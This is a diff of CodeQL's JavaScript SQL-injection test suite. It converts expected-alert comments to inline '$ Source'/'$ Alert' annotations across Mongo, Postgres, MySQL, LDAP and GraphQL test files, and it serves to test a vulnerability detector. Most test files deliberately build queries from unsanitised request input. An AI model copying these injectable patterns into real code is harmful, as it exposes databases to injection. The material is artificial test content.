mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:83:47:83:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:83:47:83:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:85:46:85:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:85:46:85:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:87:51:87:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:87:51:87:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:89:46:89:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:89:46:89:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:92:46:92:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:92:46:92:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:94:51:94:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:94:51:94:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:96:46:96:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:96:46:96:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:111:14:111:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:111:14:111:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:113:31:113:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:113:31:113:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:116:22:116:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:116:22:116:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:117:21:117:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:117:21:117:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:118:21:118:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:118:21:118:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:119:18:119:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:119:18:119:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:120:22:120:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:120:22:120:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:121:16:121:19 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:121:16:121:19 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:122:19:122:22 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:122:19:122:22 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:123:20:123:21 | id | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:123:20:123:21 | id | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:124:28:124:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:124:28:124:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:125:28:125:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:125:28:125:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:126:28:126:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:126:28:126:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:127:18:127:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:127:18:127:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:128:22:128:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:128:22:128:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:129:21:129:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:129:21:129:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:130:16:130:26 | { _id: id } | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:130:16:130:26 | { _id: id } | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:136:30:136:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:136:30:136:34 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongooseJsonParse.js:23:19:23:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:23:19:23:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | -| mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. | mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | -| mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | -| mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | -| mysql.js:19:26:19:73 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:19:26:19:73 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | -| pg-promise-types.ts:8:17:8:21 | taint | pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:8:17:8:21 | taint | This query string depends on a $@. | pg-promise-types.ts:7:17:7:28 | req.params.x | user-provided value | -| pg-promise.js:9:10:9:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:9:10:9:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:10:11:10:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:10:11:10:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:11:17:11:21 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:11:17:11:21 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:12:10:12:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:12:10:12:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:13:12:13:16 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:13:12:13:16 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:14:18:14:22 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:14:18:14:22 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:15:11:15:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:15:11:15:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:16:10:16:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:16:10:16:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:17:16:17:20 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:17:16:17:20 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:18:12:18:16 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:18:12:18:16 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:19:13:19:17 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:19:13:19:17 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:22:11:22:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:30:13:30:25 | req.params.id | pg-promise.js:30:13:30:25 | req.params.id | pg-promise.js:30:13:30:25 | req.params.id | This query string depends on a $@. | pg-promise.js:30:13:30:25 | req.params.id | user-provided value | -| pg-promise.js:34:13:34:25 | req.params.id | pg-promise.js:34:13:34:25 | req.params.id | pg-promise.js:34:13:34:25 | req.params.id | This query string depends on a $@. | pg-promise.js:34:13:34:25 | req.params.id | user-provided value | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | This query string depends on a $@. | pg-promise.js:39:7:39:19 | req.params.id | user-provided value | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | This query string depends on a $@. | pg-promise.js:40:7:40:21 | req.params.name | user-provided value | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | pg-promise.js:41:7:41:20 | req.params.foo | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | This query string depends on a $@. | pg-promise.js:41:7:41:20 | req.params.foo | user-provided value | -| pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:39:7:39:19 | req.params.id | This query string depends on a $@. | pg-promise.js:39:7:39:19 | req.params.id | user-provided value | -| pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:40:7:40:21 | req.params.name | This query string depends on a $@. | pg-promise.js:40:7:40:21 | req.params.name | user-provided value | -| pg-promise.js:47:11:47:23 | req.params.id | pg-promise.js:47:11:47:23 | req.params.id | pg-promise.js:47:11:47:23 | req.params.id | This query string depends on a $@. | pg-promise.js:47:11:47:23 | req.params.id | user-provided value | -| pg-promise.js:54:11:54:23 | req.params.id | pg-promise.js:54:11:54:23 | req.params.id | pg-promise.js:54:11:54:23 | req.params.id | This query string depends on a $@. | pg-promise.js:54:11:54:23 | req.params.id | user-provided value | -| pg-promise.js:56:14:56:29 | req.params.title | pg-promise.js:56:14:56:29 | req.params.title | pg-promise.js:56:14:56:29 | req.params.title | This query string depends on a $@. | pg-promise.js:56:14:56:29 | req.params.title | user-provided value | -| pg-promise.js:60:20:60:24 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:60:20:60:24 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:63:23:63:27 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:63:23:63:27 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:64:16:64:20 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:64:16:64:20 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| redis.js:10:16:10:27 | req.body.key | redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | This query object depends on a $@. | redis.js:10:16:10:23 | req.body | user-provided value | -| redis.js:18:16:18:18 | key | redis.js:12:15:12:22 | req.body | redis.js:18:16:18:18 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:19:43:19:45 | key | redis.js:12:15:12:22 | req.body | redis.js:19:43:19:45 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:25:14:25:16 | key | redis.js:12:15:12:22 | req.body | redis.js:25:14:25:16 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:30:23:30:25 | key | redis.js:12:15:12:22 | req.body | redis.js:30:23:30:25 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:32:28:32:30 | key | redis.js:12:15:12:22 | req.body | redis.js:32:28:32:30 | key | This query object depends on a $@. | redis.js:12:15:12:22 | req.body | user-provided value | -| redis.js:39:16:39:18 | key | redis.js:38:17:38:24 | req.body | redis.js:39:16:39:18 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | -| redis.js:43:27:43:29 | key | redis.js:38:17:38:24 | req.body | redis.js:43:27:43:29 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | -| redis.js:46:34:46:36 | key | redis.js:38:17:38:24 | req.body | redis.js:46:34:46:36 | key | This query object depends on a $@. | redis.js:38:17:38:24 | req.body | user-provided value | -| socketio.js:11:12:11:53 | `INSERT ... andle}` | socketio.js:10:25:10:30 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | This query string depends on a $@. | socketio.js:10:25:10:30 | handle | user-provided value | -| tst2.js:9:27:9:84 | "select ... d + "'" | tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | This query string depends on a $@. | tst2.js:9:66:9:78 | req.params.id | user-provided value | -| tst3.js:9:14:9:19 | query1 | tst3.js:8:16:8:34 | req.params.category | tst3.js:9:14:9:19 | query1 | This query string depends on a $@. | tst3.js:8:16:8:34 | req.params.category | user-provided value | -| tst4.js:8:10:8:66 | 'SELECT ... d + '"' | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | This query string depends on a $@. | tst4.js:8:46:8:60 | $routeParams.id | user-provided value | -| tst.js:10:10:10:64 | 'SELECT ... d + '"' | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | This query string depends on a $@. | tst.js:10:46:10:58 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js index 723348daf574..94f540c9067f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js @@ -5,8 +5,7 @@ import { Octokit } from "@octokit/core"; const kit = new Octokit(); app.get('/post/:id', function(req, res) { - const id = req.params.id; - // NOT OK + const id = req.params.id; // $ Source const response = kit.graphql(` query { repository(owner: "github", name: "${id}") { @@ -17,45 +16,45 @@ app.get('/post/:id', function(req, res) { } } } - `); + `); // $ Alert }); import { graphql, withCustomRequest } from "@octokit/graphql"; app.get('/user/:id/', function(req, res) { - const id = req.params.id; - const response = graphql(`foo ${id}`); // NOT OK + const id = req.params.id; // $ Source + const response = graphql(`foo ${id}`); // $ Alert const myGraphql = withCustomRequest(request); - const response = myGraphql(`foo ${id}`); // NOT OK + const response = myGraphql(`foo ${id}`); // $ Alert const withDefaults = graphql.defaults({}); - withDefaults(`foo ${id}`); // NOT OK + withDefaults(`foo ${id}`); // $ Alert }); const { request } = require("@octokit/request"); app.get('/article/:id/', async function(req, res) { - const id = req.params.id; + const id = req.params.id; // $ Source const result = await request("POST /graphql", { headers: { authorization: "token 0000000000000000000000000000000000000001", }, - query: `foo ${id}`, // NOT OK + query: `foo ${id}`, // $ Alert }); const withDefaults = request.defaults({}); - withDefaults("POST /graphql", { query: `foo ${id}` }); // NOT OK + withDefaults("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { Octokit as Core } from "@octokit/rest"; const kit2 = new Core(); app.get('/event/:id/', async function(req, res) { - const id = req.params.id; - const result = await kit2.graphql(`foo ${id}`); // NOT OK + const id = req.params.id; // $ Source + const result = await kit2.graphql(`foo ${id}`); // $ Alert - const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // NOT OK + const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { graphql as nativeGraphql, buildSchema } from 'graphql'; @@ -71,23 +70,22 @@ var root = { }; app.get('/thing/:id', async function(req, res) { - const id = req.query.id; - const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // NOT OK - + const id = req.query.id; // $ Source + const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert + fetch("https://my-grpahql-server.com/graphql", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ - // NOT OK query: `{ thing { name url ${id} } - }` + }` // $ Alert }) }) @@ -97,7 +95,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // OK + query: `{ thing { name @@ -116,6 +114,6 @@ const github = require('@actions/github'); app.get('/event/:id/', async function(req, res) { const kit = github.getOctokit("foo") - const id = req.params.id; - const result = await kit.graphql(`foo ${id}`); // NOT OK + const id = req.params.id; // $ Source + const result = await kit.graphql(`foo ${id}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js index 50f0293c37fa..65168320a343 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js @@ -10,9 +10,9 @@ const connection = mysql.createConnection({ database: 'test' }); -app.use(route.get('/test1', (context, param1) => { +app.use(route.get('/test1', (context, param1) => { // $ Source param1 = xss(param1) connection.query( - `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // NOT OK + `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert ); })); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js index a3bfcfd4a30d..32990a4d9338 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js @@ -22,17 +22,17 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - const query = JSON.parse(req.query.data); + const query = JSON.parse(req.query.data); // $ Source if (checkSchema(query)) { - doc.find(query); // OK + doc.find(query); } if (ajv.validate(schema, query)) { - doc.find(query); // OK + doc.find(query); } if (validate(query)) { - doc.find(query); // NOT OK - validate() doesn't sanitize + doc.find(query); // $ Alert - validate() doesn't sanitize } - doc.find(query); // NOT OK + doc.find(query); // $ Alert }); }); @@ -47,18 +47,18 @@ app.post('/documents/insert', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', async (err, db) => { let doc = db.collection('doc'); - const query = JSON.parse(req.query.data); + const query = JSON.parse(req.query.data); // $ Source const validate = joiSchema.validate(query); if (!validate.error) { - doc.find(query); // OK + doc.find(query); } else { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } try { await joiSchema.validateAsync(query); - doc.find(query); // OK - but still flagged [INCONSISTENCY] + doc.find(query); // $ SPURIOUS: Alert } catch (e) { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js index bc21bb58f4a8..3f7254c9a264 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js @@ -2,7 +2,7 @@ const Router = require('koa-router') const {Sequelize} = require("sequelize"); new Router().get("/hello", (ctx) => { - const { version } = ctx.query; + const { version } = ctx.query; // $ Source if (version && validVersion(version) === false) { throw new Error(`invalid version ${version}`); @@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => { conditions.push(`version = ${version}`) } - new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // OK + new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // $ Alert }); function validVersion(version) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js index 9502cace21a8..22bebb085121 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js @@ -17,7 +17,7 @@ const sanitizeInput = function (input) { }; const server = http.createServer((req, res) => { - let q = url.parse(req.url, true); + let q = url.parse(req.url, true); // $ Source let username = q.query.username; @@ -25,18 +25,18 @@ const server = http.createServer((req, res) => { filter: `(|(name=${username})(username=${username}))`, }; - client.search("o=example", opts1, function (err, res) {}); // NOT OK + client.search("o=example", opts1, function (err, res) {}); // $ Alert client.search( "o=example", - { filter: `(|(name=${username})(username=${username}))` }, // NOT OK + { filter: `(|(name=${username})(username=${username}))` }, // $ Alert function (err, res) {} ); - // GOOD + client.search( "o=example", - { // OK + { filter: `(|(name=${sanitizeInput(username)})(username=${sanitizeInput( username )}))`, @@ -44,7 +44,7 @@ const server = http.createServer((req, res) => { function (err, res) {} ); - // GOOD (https://github.com/ldapjs/node-ldapjs/issues/181) + // OK - https://github.com/ldapjs/node-ldapjs/issues/181 let f = new OrFilter({ filters: [ new EqualityFilter({ @@ -63,9 +63,9 @@ const server = http.createServer((req, res) => { const parsedFilter = ldap.parseFilter( `(|(name=${username})(username=${username}))` ); - client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // NOT OK + client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // $ Alert - const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // NOT OK + const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // $ Alert }); server.listen(389, () => {}); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js index 9b6d9b2fb88a..2400147dfce1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js @@ -8,8 +8,7 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post("/documents/find", (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - db.myDoc.find(query, (err, data) => {}); + db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js index 0ebbb3d8a71a..a72d0c6d3bf0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js @@ -10,8 +10,7 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post("/documents/find", (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - doc.find(query, (err, data) => {}); + doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js index c2fe712e848c..8de189521547 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js @@ -12,8 +12,7 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post("/documents/find", (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js index fc786da87ab0..a7669bf5dfbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js @@ -10,26 +10,24 @@ app.use(bodyParser.urlencoded({ extended: true })); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value - // OK: user-data is coerced to a string + // OK - user-data is coerced to a string doc.find({ title: '' + query.body.title }); - // OK: throws unless user-data is a string + // OK - throws unless user-data is a string doc.find({ title: query.body.title.substr(1) }); - let title = req.body.title; + let title = req.body.title; // $ Source if (typeof title === "string") { - // OK: input checked to be a string + // OK - input checked to be a string doc.find({ title: title }); - // NOT OK: input is parsed as JSON after string check - doc.find({ title: JSON.parse(title) }); + doc.find({ title: JSON.parse(title) }); // $ Alert - input is parsed as JSON after string check } }); }); @@ -39,50 +37,46 @@ app.get('/:id', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); }); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.query.title; + query.title = req.query.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.query.title; + query.title = req.query.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, client) => { let doc = client.db("MASTER").collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); app.post("/logs/count-by-tag", (req, res) => { - let tag = req.query.tag; + let tag = req.query.tag; // $ Source MongoClient.connect(process.env.DB_URL, {}, (err, client) => { client .db(process.env.DB_NAME) .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); let importedDbo = require("./dbo.js"); importedDbo .db() .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); @@ -94,7 +88,7 @@ function useParams(params) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); } @@ -104,11 +98,10 @@ app.post('/documents/find', (req, res) => { }); function useQuery(queries) { const query = {}; - query.title = queries.title; + query.title = queries.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js index 61a87bfaa5ad..26d30260aae0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js @@ -14,18 +14,17 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: req.body is safe + // OK - req.body is safe doc.find(query); }); }); app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.query.title; + query.title = req.query.title; // $ Source MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: regardless of body parser, query value is still tainted - doc.find(query); + doc.find(query); // $ Alert - regardless of body parser, query value is still tainted }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js index 3092a60b2cd2..3ee23ad0e931 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js @@ -18,85 +18,71 @@ const Document = Mongoose.model('Document', { app.post('/documents/find', (req, res) => { const query = {}; - query.title = req.body.title; + query.title = req.body.title; // $ Source - // NOT OK: query is tainted by user-provided object value - Document.aggregate([query]); + Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.count(query); + Document.count(query); 